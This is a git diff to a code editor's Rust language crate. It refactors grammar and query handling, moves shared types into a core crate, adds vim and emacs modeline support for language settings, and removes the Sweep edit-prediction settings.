Some(OverrideConfig { - query, - values: override_configs_by_id, - }); Ok(self) } - pub fn with_redaction_query(mut self, source: &str) -> anyhow::Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - let mut 
redaction_capture_ix = 0; - if populate_capture_indices( - &query, - &self.config.name, - "redactions", - &[], - &mut [Capture::Required("redact", &mut redaction_capture_ix)], - ) { - self.grammar_mut()?.redactions_config = Some(RedactionConfig { - query, - redaction_capture_ix, - }); + fn with_grammar_query_and_name( + mut self, + build: impl FnOnce(Grammar, &LanguageName) -> Result, + ) -> Result { + if let Some(grammar_arc) = self.grammar.take() { + let grammar = Arc::try_unwrap(grammar_arc) + .map_err(|_| anyhow::anyhow!("cannot mutate grammar"))?; + self.grammar = Some(Arc::new(build(grammar, &self.config.name)?)); } Ok(self) } - fn expect_grammar(&self) -> Result<&Grammar> { - self.grammar - .as_ref() - .map(|grammar| grammar.as_ref()) - .context("no grammar for language") - } - - fn grammar_mut(&mut self) -> Result<&mut Grammar> { - Arc::get_mut(self.grammar.as_mut().context("no grammar for language")?) - .context("cannot mutate grammar") - } - pub fn name(&self) -> LanguageName { self.config.name.clone() } @@ -2074,6 +977,23 @@ impl Language { .unwrap_or_else(|| self.config.name.as_ref().to_lowercase().into()) } + pub fn matches_kernel_language(&self, kernel_language: &str) -> bool { + let kernel_language_lower = kernel_language.to_lowercase(); + + if self.code_fence_block_name().to_lowercase() == kernel_language_lower { + return true; + } + + if self.config.name.as_ref().to_lowercase() == kernel_language_lower { + return true; + } + + self.config + .kernel_language_names + .iter() + .any(|name| name.to_lowercase() == kernel_language_lower) + } + pub fn context_provider(&self) -> Option> { self.context_provider.clone() } @@ -2089,7 +1009,7 @@ impl Language { ) -> Vec<(Range, HighlightId)> { let mut result = Vec::new(); if let Some(grammar) = &self.grammar { - let tree = grammar.parse_text(text, None); + let tree = parse_text(grammar, text, None); let captures = SyntaxSnapshot::single_tree_captures(range.clone(), text, &tree, self, |grammar| { grammar @@ 
-2103,9 +1023,7 @@ impl Language { BufferChunks::new(text, range, Some((captures, highlight_maps)), false, None) { let end_offset = offset + chunk.text.len(); - if let Some(highlight_id) = chunk.syntax_highlight_id - && !highlight_id.is_default() - { + if let Some(highlight_id) = chunk.syntax_highlight_id { result.push((offset..end_offset, highlight_id)); } offset = end_offset; @@ -2127,7 +1045,7 @@ impl Language { && let Some(highlights_config) = &grammar.highlights_config { *grammar.highlight_map.lock() = - HighlightMap::new(highlights_config.query.capture_names(), theme); + build_highlight_map(highlights_config.query.capture_names(), theme); } } @@ -2155,6 +1073,15 @@ impl Language { } } +#[inline] +pub fn build_highlight_map(capture_names: &[&str], theme: &SyntaxTheme) -> HighlightMap { + HighlightMap::from_ids( + capture_names + .iter() + .map(|capture_name| theme.highlight_id(capture_name).map(HighlightId::new)), + ) +} + impl LanguageScope { pub fn path_suffixes(&self) -> &[String] { self.language.path_suffixes() @@ -2336,85 +1263,37 @@ impl Debug for Language { } } -impl Grammar { - pub fn id(&self) -> GrammarId { - self.id - } - - fn parse_text(&self, text: &Rope, old_tree: Option) -> Tree { - with_parser(|parser| { - parser - .set_language(&self.ts_language) - .expect("incompatible grammar"); - let mut chunks = text.chunks_in_range(0..text.len()); - parser - .parse_with_options( - &mut move |offset, _| { - chunks.seek(offset); - chunks.next().unwrap_or("").as_bytes() - }, - old_tree.as_ref(), - None, - ) - .unwrap() - }) - } - - pub fn highlight_map(&self) -> HighlightMap { - self.highlight_map.lock().clone() - } - - pub fn highlight_id_for_name(&self, name: &str) -> Option { - let capture_id = self - .highlights_config - .as_ref()? 
- .query - .capture_index_for_name(name)?; - Some(self.highlight_map.lock().get(capture_id)) - } - - pub fn debug_variables_config(&self) -> Option<&DebugVariablesConfig> { - self.debug_variables_config.as_ref() - } - - pub fn imports_config(&self) -> Option<&ImportsConfig> { - self.imports_config.as_ref() - } +pub(crate) fn parse_text(grammar: &Grammar, text: &Rope, old_tree: Option) -> Tree { + with_parser(|parser| { + parser + .set_language(&grammar.ts_language) + .expect("incompatible grammar"); + let mut chunks = text.chunks_in_range(0..text.len()); + parser + .parse_with_options( + &mut move |offset, _| { + chunks.seek(offset); + chunks.next().unwrap_or("").as_bytes() + }, + old_tree.as_ref(), + None, + ) + .unwrap() + }) } -impl CodeLabelBuilder { - pub fn respan_filter_range(&mut self, filter_text: Option<&str>) { - self.filter_range = filter_text - .and_then(|filter| self.text.find(filter).map(|ix| ix..ix + filter.len())) - .unwrap_or(0..self.text.len()); - } - - pub fn push_str(&mut self, text: &str, highlight: Option) { - let start_ix = self.text.len(); - self.text.push_str(text); - if let Some(highlight) = highlight { - let end_ix = self.text.len(); - self.runs.push((start_ix..end_ix, highlight)); - } - } - - pub fn build(mut self) -> CodeLabel { - if self.filter_range.end == 0 { - self.respan_filter_range(None); - } - CodeLabel { - text: self.text, - runs: self.runs, - filter_range: self.filter_range, - } - } +pub trait CodeLabelExt { + fn fallback_for_completion( + item: &lsp::CompletionItem, + language: Option<&Language>, + ) -> CodeLabel; } -impl CodeLabel { - pub fn fallback_for_completion( +impl CodeLabelExt for CodeLabel { + fn fallback_for_completion( item: &lsp::CompletionItem, language: Option<&Language>, - ) -> Self { + ) -> CodeLabel { let highlight_id = item.kind.and_then(|kind| { let grammar = language?.grammar()?; use lsp::CompletionItemKind as Kind; @@ -2465,98 +1344,12 @@ impl CodeLabel { .as_deref() .and_then(|filter| 
text.find(filter).map(|ix| ix..ix + filter.len())) .unwrap_or(0..label_length); - Self { + CodeLabel { text, runs, filter_range, } } - - pub fn plain(text: String, filter_text: Option<&str>) -> Self { - Self::filtered(text.clone(), text.len(), filter_text, Vec::new()) - } - - pub fn filtered( - text: String, - label_len: usize, - filter_text: Option<&str>, - runs: Vec<(Range, HighlightId)>, - ) -> Self { - assert!(label_len <= text.len()); - let filter_range = filter_text - .and_then(|filter| text.find(filter).map(|ix| ix..ix + filter.len())) - .unwrap_or(0..label_len); - Self::new(text, filter_range, runs) - } - - pub fn new( - text: String, - filter_range: Range, - runs: Vec<(Range, HighlightId)>, - ) -> Self { - assert!( - text.get(filter_range.clone()).is_some(), - "invalid filter range" - ); - runs.iter().for_each(|(range, _)| { - assert!( - text.get(range.clone()).is_some(), - "invalid run range with inputs. Requested range {range:?} in text '{text}'", - ); - }); - Self { - runs, - filter_range, - text, - } - } - - pub fn text(&self) -> &str { - self.text.as_str() - } - - pub fn filter_text(&self) -> &str { - &self.text[self.filter_range.clone()] - } -} - -impl From for CodeLabel { - fn from(value: String) -> Self { - Self::plain(value, None) - } -} - -impl From<&str> for CodeLabel { - fn from(value: &str) -> Self { - Self::plain(value.to_string(), None) - } -} - -impl Ord for LanguageMatcher { - fn cmp(&self, other: &Self) -> std::cmp::Ordering { - self.path_suffixes.cmp(&other.path_suffixes).then_with(|| { - self.first_line_pattern - .as_ref() - .map(Regex::as_str) - .cmp(&other.first_line_pattern.as_ref().map(Regex::as_str)) - }) - } -} - -impl PartialOrd for LanguageMatcher { - fn partial_cmp(&self, other: &Self) -> Option { - Some(self.cmp(other)) - } -} - -impl Eq for LanguageMatcher {} - -impl PartialEq for LanguageMatcher { - fn eq(&self, other: &Self) -> bool { - self.path_suffixes == other.path_suffixes - && 
self.first_line_pattern.as_ref().map(Regex::as_str) - == other.first_line_pattern.as_ref().map(Regex::as_str) - } } #[cfg(any(test, feature = "test-support"))] @@ -2638,6 +1431,7 @@ impl LspAdapter for FakeLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _cx: &mut AsyncApp, ) -> Result> { Ok(self.initialization_options.clone()) } @@ -2656,68 +1450,6 @@ impl LspAdapter for FakeLspAdapter { } } -enum Capture<'a> { - Required(&'static str, &'a mut u32), - Optional(&'static str, &'a mut Option), -} - -fn populate_capture_indices( - query: &Query, - language_name: &LanguageName, - query_type: &str, - expected_prefixes: &[&str], - captures: &mut [Capture<'_>], -) -> bool { - let mut found_required_indices = Vec::new(); - 'outer: for (ix, name) in query.capture_names().iter().enumerate() { - for (required_ix, capture) in captures.iter_mut().enumerate() { - match capture { - Capture::Required(capture_name, index) if capture_name == name => { - **index = ix as u32; - found_required_indices.push(required_ix); - continue 'outer; - } - Capture::Optional(capture_name, index) if capture_name == name => { - **index = Some(ix as u32); - continue 'outer; - } - _ => {} - } - } - if !name.starts_with("_") - && !expected_prefixes - .iter() - .any(|&prefix| name.starts_with(prefix)) - { - log::warn!( - "unrecognized capture name '{}' in {} {} TreeSitter query \ - (suppress this warning by prefixing with '_')", - name, - language_name, - query_type - ); - } - } - let mut missing_required_captures = Vec::new(); - for (capture_ix, capture) in captures.iter().enumerate() { - if let Capture::Required(capture_name, _) = capture - && !found_required_indices.contains(&capture_ix) - { - missing_required_captures.push(*capture_name); - } - } - let success = missing_required_captures.is_empty(); - if !success { - log::error!( - "missing required capture(s) in {} {} TreeSitter query: {}", - language_name, - query_type, - missing_required_captures.join(", ") - ); - } - success -} 
- pub fn point_to_lsp(point: PointUtf16) -> lsp::Position { lsp::Position::new(point.row, point.column) } @@ -2767,41 +1499,78 @@ pub fn rust_lang() -> Arc { ..Default::default() }, line_comments: vec!["// ".into(), "/// ".into(), "//! ".into()], + brackets: BracketPairConfig { + pairs: vec![ + BracketPair { + start: "{".into(), + end: "}".into(), + close: true, + surround: false, + newline: true, + }, + BracketPair { + start: "[".into(), + end: "]".into(), + close: true, + surround: false, + newline: true, + }, + BracketPair { + start: "(".into(), + end: ")".into(), + close: true, + surround: false, + newline: true, + }, + BracketPair { + start: "<".into(), + end: ">".into(), + close: false, + surround: false, + newline: true, + }, + BracketPair { + start: "\"".into(), + end: "\"".into(), + close: true, + surround: false, + newline: false, + }, + ], + ..Default::default() + }, ..Default::default() }, Some(tree_sitter_rust::LANGUAGE.into()), ) .with_queries(LanguageQueries { outline: Some(Cow::from(include_str!( - "../../languages/src/rust/outline.scm" + "../../grammars/src/rust/outline.scm" ))), indents: Some(Cow::from(include_str!( - "../../languages/src/rust/indents.scm" + "../../grammars/src/rust/indents.scm" ))), brackets: Some(Cow::from(include_str!( - "../../languages/src/rust/brackets.scm" + "../../grammars/src/rust/brackets.scm" ))), text_objects: Some(Cow::from(include_str!( - "../../languages/src/rust/textobjects.scm" + "../../grammars/src/rust/textobjects.scm" ))), highlights: Some(Cow::from(include_str!( - "../../languages/src/rust/highlights.scm" + "../../grammars/src/rust/highlights.scm" ))), injections: Some(Cow::from(include_str!( - "../../languages/src/rust/injections.scm" + "../../grammars/src/rust/injections.scm" ))), overrides: Some(Cow::from(include_str!( - "../../languages/src/rust/overrides.scm" + "../../grammars/src/rust/overrides.scm" ))), redactions: None, runnables: Some(Cow::from(include_str!( - "../../languages/src/rust/runnables.scm" 
+ "../../grammars/src/rust/runnables.scm" ))), debugger: Some(Cow::from(include_str!( - "../../languages/src/rust/debugger.scm" - ))), - imports: Some(Cow::from(include_str!( - "../../languages/src/rust/imports.scm" + "../../grammars/src/rust/debugger.scm" ))), }) .expect("Could not parse queries"); @@ -2826,19 +1595,19 @@ pub fn markdown_lang() -> Arc { ) .with_queries(LanguageQueries { brackets: Some(Cow::from(include_str!( - "../../languages/src/markdown/brackets.scm" + "../../grammars/src/markdown/brackets.scm" ))), injections: Some(Cow::from(include_str!( - "../../languages/src/markdown/injections.scm" + "../../grammars/src/markdown/injections.scm" ))), highlights: Some(Cow::from(include_str!( - "../../languages/src/markdown/highlights.scm" + "../../grammars/src/markdown/highlights.scm" ))), indents: Some(Cow::from(include_str!( - "../../languages/src/markdown/indents.scm" + "../../grammars/src/markdown/indents.scm" ))), outline: Some(Cow::from(include_str!( - "../../languages/src/markdown/outline.scm" + "../../grammars/src/markdown/outline.scm" ))), ..LanguageQueries::default() }) @@ -2849,10 +1618,47 @@ pub fn markdown_lang() -> Arc { #[cfg(test)] mod tests { use super::*; - use gpui::TestAppContext; + use gpui::{TestAppContext, rgba}; use pretty_assertions::assert_matches; + #[test] + fn test_highlight_map() { + let theme = SyntaxTheme::new( + [ + ("function", rgba(0x100000ff)), + ("function.method", rgba(0x200000ff)), + ("function.async", rgba(0x300000ff)), + ("variable.builtin.self.rust", rgba(0x400000ff)), + ("variable.builtin", rgba(0x500000ff)), + ("variable", rgba(0x600000ff)), + ] + .iter() + .map(|(name, color)| (name.to_string(), (*color).into())), + ); + + let capture_names = &[ + "function.special", + "function.async.rust", + "variable.builtin.self", + ]; + + let map = build_highlight_map(capture_names, &theme); + assert_eq!( + theme.get_capture_name(map.get(0).unwrap()), + Some("function") + ); + assert_eq!( + 
theme.get_capture_name(map.get(1).unwrap()), + Some("function.async") + ); + assert_eq!( + theme.get_capture_name(map.get(2).unwrap()), + Some("variable.builtin") + ); + } + #[gpui::test(iterations = 10)] + async fn test_language_loading(cx: &mut TestAppContext) { let languages = LanguageRegistry::test(cx.executor()); let languages = Arc::new(languages); diff --git a/crates/language/src/language_registry.rs b/crates/language/src/language_registry.rs index d73a44fda3347ebcec9c6798325838acec543566..2ac6ef456d2ee17c8710ec1c37f22ff34a648e4d 100644 --- a/crates/language/src/language_registry.rs +++ b/crates/language/src/language_registry.rs @@ -5,6 +5,10 @@ use crate::{ }; use anyhow::{Context as _, Result, anyhow}; use collections::{FxHashMap, HashMap, HashSet, hash_map}; +pub use language_core::{ + BinaryStatus, LanguageName, LanguageQueries, LanguageServerStatusUpdate, + QUERY_FILENAME_PREFIXES, ServerHealth, +}; use settings::{AllLanguageSettingsContent, LanguageSettingsContent}; use futures::{ @@ -12,15 +16,13 @@ use futures::{ channel::{mpsc, oneshot}, }; use globset::GlobSet; -use gpui::{App, BackgroundExecutor, SharedString}; +use gpui::{App, BackgroundExecutor}; use lsp::LanguageServerId; use parking_lot::{Mutex, RwLock}; use postage::watch; -use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; + use smallvec::SmallVec; use std::{ - borrow::{Borrow, Cow}, cell::LazyCell, ffi::OsStr, ops::Not, @@ -33,91 +35,6 @@ use theme::Theme; use unicase::UniCase; use util::{ResultExt, maybe, post_inc}; -#[derive( - Debug, Clone, Hash, PartialEq, Eq, PartialOrd, Ord, Serialize, Deserialize, JsonSchema, -)] -pub struct LanguageName(pub SharedString); - -impl LanguageName { - pub fn new(s: &str) -> Self { - Self(SharedString::new(s)) - } - - pub fn new_static(s: &'static str) -> Self { - Self(SharedString::new_static(s)) - } - - pub fn from_proto(s: String) -> Self { - Self(SharedString::from(s)) - } - - pub fn to_proto(&self) -> String { - self.0.to_string() - } - 
- pub fn lsp_id(&self) -> String { - match self.0.as_ref() { - "Plain Text" => "plaintext".to_string(), - language_name => language_name.to_lowercase(), - } - } -} - -impl From for SharedString { - fn from(value: LanguageName) -> Self { - value.0 - } -} - -impl From for LanguageName { - fn from(value: SharedString) -> Self { - LanguageName(value) - } -} - -impl AsRef for LanguageName { - fn as_ref(&self) -> &str { - self.0.as_ref() - } -} - -impl Borrow for LanguageName { - fn borrow(&self) -> &str { - self.0.as_ref() - } -} - -impl PartialEq for LanguageName { - fn eq(&self, other: &str) -> bool { - self.0.as_ref() == other - } -} - -impl PartialEq<&str> for LanguageName { - fn eq(&self, other: &&str) -> bool { - self.0.as_ref() == *other - } -} - -impl std::fmt::Display for LanguageName { - fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { - write!(f, "{}", self.0) - } -} - -impl From<&'static str> for LanguageName { - fn from(str: &'static str) -> Self { - Self(SharedString::new_static(str)) - } -} - -impl From for String { - fn from(value: LanguageName) -> Self { - let value: &str = &value.0; - Self::from(value) - } -} - pub struct LanguageRegistry { state: RwLock, language_server_download_dir: Option>, @@ -153,31 +70,6 @@ pub struct FakeLanguageServerEntry { pub _server: Option, } -#[derive(Clone, Debug, PartialEq, Eq)] -pub enum LanguageServerStatusUpdate { - Binary(BinaryStatus), - Health(ServerHealth, Option), -} - -#[derive(Debug, PartialEq, Eq, Deserialize, Serialize, Clone, Copy)] -#[serde(rename_all = "camelCase")] -pub enum ServerHealth { - Ok, - Warning, - Error, -} - -#[derive(Clone, Debug, PartialEq, Eq)] -pub enum BinaryStatus { - None, - CheckingForUpdate, - Downloading, - Starting, - Stopping, - Stopped, - Failed { error: String }, -} - #[derive(Clone)] pub struct AvailableLanguage { id: LanguageId, @@ -232,39 +124,6 @@ impl std::fmt::Display for LanguageNotFound { } } -pub const QUERY_FILENAME_PREFIXES: &[( - &str, - fn(&mut 
LanguageQueries) -> &mut Option>, -)] = &[ - ("highlights", |q| &mut q.highlights), - ("brackets", |q| &mut q.brackets), - ("outline", |q| &mut q.outline), - ("indents", |q| &mut q.indents), - ("injections", |q| &mut q.injections), - ("overrides", |q| &mut q.overrides), - ("redactions", |q| &mut q.redactions), - ("runnables", |q| &mut q.runnables), - ("debugger", |q| &mut q.debugger), - ("textobjects", |q| &mut q.text_objects), - ("imports", |q| &mut q.imports), -]; - -/// Tree-sitter language queries for a given language. -#[derive(Debug, Default)] -pub struct LanguageQueries { - pub highlights: Option>, - pub brackets: Option>, - pub indents: Option>, - pub outline: Option>, - pub injections: Option>, - pub overrides: Option>, - pub redactions: Option>, - pub runnables: Option>, - pub text_objects: Option>, - pub debugger: Option>, - pub imports: Option>, -} - #[derive(Clone, Default)] struct ServerStatusSender { txs: Arc>>>, @@ -745,6 +604,44 @@ impl LanguageRegistry { .cloned() } + /// Look up a language by its modeline name (vim filetype or emacs mode). + /// + /// This performs a case-insensitive match against: + /// 1. Explicit modeline aliases defined in the language config + /// 2. The language's grammar name + /// 3. 
The language name itself + pub fn available_language_for_modeline_name( + self: &Arc, + modeline_name: &str, + ) -> Option { + let modeline_name_lower = modeline_name.to_lowercase(); + let state = self.state.read(); + + state + .available_languages + .iter() + .find(|lang| { + lang.matcher + .modeline_aliases + .iter() + .any(|alias| alias.to_lowercase() == modeline_name_lower) + }) + .or_else(|| { + state.available_languages.iter().find(|lang| { + lang.grammar + .as_ref() + .is_some_and(|g| g.to_lowercase() == modeline_name_lower) + }) + }) + .or_else(|| { + state + .available_languages + .iter() + .find(|lang| lang.name.0.to_lowercase() == modeline_name_lower) + }) + .cloned() + } + pub fn language_for_file( self: &Arc, file: &Arc, @@ -1223,7 +1120,7 @@ impl LanguageRegistryState { LanguageSettingsContent { tab_size: language.config.tab_size, hard_tabs: language.config.hard_tabs, - soft_wrap: language.config.soft_wrap, + soft_wrap: language.config.soft_wrap.map(crate::to_settings_soft_wrap), auto_indent_on_paste: language.config.auto_indent_on_paste, ..Default::default() }, diff --git a/crates/language/src/language_settings.rs b/crates/language/src/language_settings.rs index 40e3da789d4785cc5fd56589b09735ba8592ebc7..986654e6fcd455ad2aa64bbd0a5548eeedd4afdd 100644 --- a/crates/language/src/language_settings.rs +++ b/crates/language/src/language_settings.rs @@ -1,6 +1,8 @@ //! Provides `language`-related settings. 
-use crate::{File, Language, LanguageName, LanguageServerName}; +use crate::{ + Buffer, BufferSnapshot, File, Language, LanguageName, LanguageServerName, ModelineSettings, +}; use collections::{FxHashMap, HashMap, HashSet}; use ec4rs::{ Properties as EditorconfigProperties, @@ -12,27 +14,15 @@ use itertools::{Either, Itertools}; use settings::{DocumentFoldingRanges, DocumentSymbols, IntoGpui, SemanticTokens}; pub use settings::{ - CompletionSettingsContent, EditPredictionPromptFormat, EditPredictionProvider, + AutoIndentMode, CompletionSettingsContent, EditPredictionPromptFormat, EditPredictionProvider, EditPredictionsMode, FormatOnSave, Formatter, FormatterList, InlayHintKind, LanguageSettingsContent, LspInsertMode, RewrapBehavior, ShowWhitespaceSetting, SoftWrap, WordsCompletionMode, }; -use settings::{RegisterSetting, Settings, SettingsLocation, SettingsStore}; +use settings::{RegisterSetting, Settings, SettingsLocation, SettingsStore, merge_from::MergeFrom}; use shellexpand; use std::{borrow::Cow, num::NonZeroU32, path::Path, sync::Arc}; - -/// Returns the settings for the specified language from the provided file. -pub fn language_settings<'a>( - language: Option, - file: Option<&'a Arc>, - cx: &'a App, -) -> Cow<'a, LanguageSettings> { - let location = file.map(|f| SettingsLocation { - worktree_id: f.worktree_id(cx), - path: f.path().as_ref(), - }); - AllLanguageSettings::get(location, cx).language(location, language.as_ref(), cx) -} +use text::ToOffset; /// Returns the settings for all languages from the provided file. pub fn all_language_settings<'a>( @@ -144,8 +134,8 @@ pub struct LanguageSettings { /// Whether to use additional LSP queries to format (and amend) the code after /// every "trigger" symbol input, defined by LSP server capabilities. pub use_on_type_format: bool, - /// Whether indentation should be adjusted based on the context whilst typing. - pub auto_indent: bool, + /// Controls automatic indentation behavior when typing. 
+ pub auto_indent: AutoIndentMode, /// Whether indentation of pasted content should be adjusted based on the context. pub auto_indent_on_paste: bool, /// Controls how the editor handles the autoclosed characters. @@ -284,6 +274,74 @@ impl LanguageSettings { /// A token representing the rest of the available language servers. const REST_OF_LANGUAGE_SERVERS: &'static str = "..."; + pub fn for_buffer<'a>(buffer: &'a Buffer, cx: &'a App) -> Cow<'a, LanguageSettings> { + Self::resolve(Some(buffer), None, cx) + } + + pub fn for_buffer_at<'a, D: ToOffset>( + buffer: &'a Buffer, + position: D, + cx: &'a App, + ) -> Cow<'a, LanguageSettings> { + let language = buffer.language_at(position); + Self::resolve(Some(buffer), language.map(|l| l.name()).as_ref(), cx) + } + + pub fn for_buffer_snapshot<'a>( + buffer: &'a BufferSnapshot, + offset: Option, + cx: &'a App, + ) -> Cow<'a, LanguageSettings> { + let location = buffer.file().map(|f| SettingsLocation { + worktree_id: f.worktree_id(cx), + path: f.path().as_ref(), + }); + + let language = if let Some(offset) = offset { + buffer.language_at(offset) + } else { + buffer.language() + }; + + let mut settings = AllLanguageSettings::get(location, cx).language( + location, + language.map(|l| l.name()).as_ref(), + cx, + ); + + if let Some(modeline) = buffer.modeline() { + merge_with_modeline(settings.to_mut(), modeline); + } + + settings + } + + pub fn resolve<'a>( + buffer: Option<&'a Buffer>, + override_language: Option<&LanguageName>, + cx: &'a App, + ) -> Cow<'a, LanguageSettings> { + let Some(buffer) = buffer else { + return AllLanguageSettings::get(None, cx).language(None, override_language, cx); + }; + let location = buffer.file().map(|f| SettingsLocation { + worktree_id: f.worktree_id(cx), + path: f.path().as_ref(), + }); + let all = AllLanguageSettings::get(location, cx); + let mut settings = if override_language.is_none() { + all.language(location, buffer.language().map(|l| l.name()).as_ref(), cx) + } else { + 
all.language(location, override_language, cx) + }; + + if let Some(modeline) = buffer.modeline() { + merge_with_modeline(settings.to_mut(), modeline); + } + + settings + } + /// Returns the customized list of language servers from the list of /// available language servers. pub fn customized_language_servers( @@ -396,8 +454,7 @@ impl InlayHintSettings { } } -/// The settings for edit predictions, such as [GitHub Copilot](https://github.com/features/copilot) -/// or [Supermaven](https://supermaven.com). +/// The settings for edit predictions, such as [GitHub Copilot](https://github.com/features/copilot). #[derive(Clone, Debug, Default)] pub struct EditPredictionSettings { /// The provider that supplies edit predictions. @@ -412,14 +469,9 @@ pub struct EditPredictionSettings { pub copilot: CopilotSettings, /// Settings specific to Codestral. pub codestral: CodestralSettings, - /// Settings specific to Sweep. - pub sweep: SweepSettings, /// Settings specific to Ollama. pub ollama: Option, pub open_ai_compatible_api: Option, - /// Whether edit predictions are enabled in the assistant panel. - /// This setting has no effect if globally disabled. - pub enabled_in_text_threads: bool, pub examples_dir: Option>, } @@ -465,15 +517,6 @@ pub struct CodestralSettings { pub api_url: Option, } -#[derive(Clone, Debug, Default)] -pub struct SweepSettings { - /// When enabled, Sweep will not store edit prediction inputs or outputs. - /// When disabled, Sweep may collect data including buffer contents, - /// diagnostics, file paths, repository names, and generated predictions - /// to improve the service. - pub privacy_mode: bool, -} - #[derive(Clone, Debug, Default)] pub struct OpenAiCompatibleEditPredictionSettings { /// Model to use for completions. 
@@ -531,6 +574,42 @@ impl AllLanguageSettings { } } +fn merge_with_modeline(settings: &mut LanguageSettings, modeline: &ModelineSettings) { + let show_whitespaces = modeline.show_trailing_whitespace.and_then(|v| { + if v { + Some(ShowWhitespaceSetting::Trailing) + } else { + None + } + }); + + settings + .tab_size + .merge_from_option(modeline.tab_size.as_ref()); + settings + .hard_tabs + .merge_from_option(modeline.hard_tabs.as_ref()); + settings + .preferred_line_length + .merge_from_option(modeline.preferred_line_length.map(u32::from).as_ref()); + let auto_indent_mode = modeline.auto_indent.map(|enabled| { + if enabled { + AutoIndentMode::SyntaxAware + } else { + AutoIndentMode::None + } + }); + settings + .auto_indent + .merge_from_option(auto_indent_mode.as_ref()); + settings + .show_whitespaces + .merge_from_option(show_whitespaces.as_ref()); + settings + .ensure_final_newline_on_save + .merge_from_option(modeline.ensure_final_newline.as_ref()); +} + fn merge_with_editorconfig(settings: &mut LanguageSettings, cfg: &EditorconfigProperties) { let preferred_line_length = cfg.get::().ok().and_then(|v| match v { MaxLineLen::Value(u) => Some(u as u32), @@ -558,22 +637,18 @@ fn merge_with_editorconfig(settings: &mut LanguageSettings, cfg: &EditorconfigPr TrimTrailingWs::Value(b) => b, }) .ok(); - fn merge(target: &mut T, value: Option) { - if let Some(value) = value { - *target = value; - } - } - merge(&mut settings.preferred_line_length, preferred_line_length); - merge(&mut settings.tab_size, tab_size); - merge(&mut settings.hard_tabs, hard_tabs); - merge( - &mut settings.remove_trailing_whitespace_on_save, - remove_trailing_whitespace_on_save, - ); - merge( - &mut settings.ensure_final_newline_on_save, - ensure_final_newline_on_save, - ); + + settings + .preferred_line_length + .merge_from_option(preferred_line_length.as_ref()); + settings.tab_size.merge_from_option(tab_size.as_ref()); + settings.hard_tabs.merge_from_option(hard_tabs.as_ref()); + settings + 
.remove_trailing_whitespace_on_save + .merge_from_option(remove_trailing_whitespace_on_save.as_ref()); + settings + .ensure_final_newline_on_save + .merge_from_option(ensure_final_newline_on_save.as_ref()); } impl settings::Settings for AllLanguageSettings { @@ -716,10 +791,6 @@ impl settings::Settings for AllLanguageSettings { api_url: codestral.api_url, }; - let sweep = edit_predictions.sweep.unwrap(); - let sweep_settings = SweepSettings { - privacy_mode: sweep.privacy_mode.unwrap(), - }; let ollama = edit_predictions.ollama.unwrap(); let ollama_settings = ollama .model @@ -746,8 +817,6 @@ impl settings::Settings for AllLanguageSettings { prompt_format: openai_compatible_settings.prompt_format.unwrap(), }); - let enabled_in_text_threads = edit_predictions.enabled_in_text_threads.unwrap(); - let mut file_types: FxHashMap, (GlobSet, Vec)> = FxHashMap::default(); for (language, patterns) in all_languages.file_types.iter().flatten() { @@ -783,10 +852,8 @@ impl settings::Settings for AllLanguageSettings { mode: edit_predictions_mode, copilot: copilot_settings, codestral: codestral_settings, - sweep: sweep_settings, ollama: ollama_settings, open_ai_compatible_api: openai_compatible_settings, - enabled_in_text_threads, examples_dir: edit_predictions.examples_dir, }, defaults: default_language_settings, diff --git a/crates/language/src/manifest.rs b/crates/language/src/manifest.rs index 82ed164a032cb18d2d011f59938a0cd1410ba60f..a155ac28332e8b1d4f5a2c238e3622169787789c 100644 --- a/crates/language/src/manifest.rs +++ b/crates/language/src/manifest.rs @@ -1,43 +1,12 @@ -use std::{borrow::Borrow, sync::Arc}; +use std::sync::Arc; -use gpui::SharedString; use settings::WorktreeId; use util::rel_path::RelPath; -#[derive(Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord)] -pub struct ManifestName(SharedString); +// Re-export ManifestName from language_core. 
+pub use language_core::ManifestName; -impl Borrow for ManifestName { - fn borrow(&self) -> &SharedString { - &self.0 - } -} - -impl Borrow for ManifestName { - fn borrow(&self) -> &str { - &self.0 - } -} - -impl From for ManifestName { - fn from(value: SharedString) -> Self { - Self(value) - } -} - -impl From for SharedString { - fn from(value: ManifestName) -> Self { - value.0 - } -} - -impl AsRef for ManifestName { - fn as_ref(&self) -> &SharedString { - &self.0 - } -} - -/// Represents a manifest query; given a path to a file, [ManifestSearcher] is tasked with finding a path to the directory containing the manifest for that file. +/// Represents a manifest query; given a path to a file, the manifest provider is tasked with finding a path to the directory containing the manifest for that file. /// /// Since parts of the path might have already been explored, there's an additional `depth` parameter that indicates to what ancestry level a given path should be explored. /// For example, given a path like `foo/bar/baz`, a depth of 2 would explore `foo/bar/baz` and `foo/bar`, but not `foo`. diff --git a/crates/language/src/modeline.rs b/crates/language/src/modeline.rs new file mode 100644 index 0000000000000000000000000000000000000000..8b7e6044492fc64c5291a9d034466e1ec42a5ead --- /dev/null +++ b/crates/language/src/modeline.rs @@ -0,0 +1,763 @@ +use regex::Regex; +use std::{num::NonZeroU32, sync::LazyLock}; + +/// The settings extracted from an emacs/vim modelines. +/// +/// The parsing tries to best match the modeline directives and +/// variables to Zed, matching LanguageSettings fields. +/// The mode mapping is done later thanks to the LanguageRegistry. +/// +/// It is not exhaustive, but covers the most common settings. +#[derive(Debug, Clone, Default, PartialEq)] +pub struct ModelineSettings { + /// The emacs mode or vim filetype. + pub mode: Option, + /// How many columns a tab should occupy. 
+ pub tab_size: Option, + /// Whether to indent lines using tab characters, as opposed to multiple + /// spaces. + pub hard_tabs: Option, + /// The number of bytes that comprise the indentation. + pub indent_size: Option, + /// Whether to auto-indent lines. + pub auto_indent: Option, + /// The column at which to soft-wrap lines. + pub preferred_line_length: Option, + /// Whether to ensure a final newline at the end of the file. + pub ensure_final_newline: Option, + /// Whether to show trailing whitespace on the editor. + pub show_trailing_whitespace: Option, + + /// Emacs modeline variables that were parsed but not mapped to Zed settings. + /// Stored as (variable-name, value) pairs. + pub emacs_extra_variables: Vec<(String, String)>, + /// Vim modeline options that were parsed but not mapped to Zed settings. + /// Stored as (option-name, value) pairs. + pub vim_extra_variables: Vec<(String, Option)>, +} + +impl ModelineSettings { + fn has_settings(&self) -> bool { + self != &Self::default() + } +} + +/// Parse modelines from file content. 
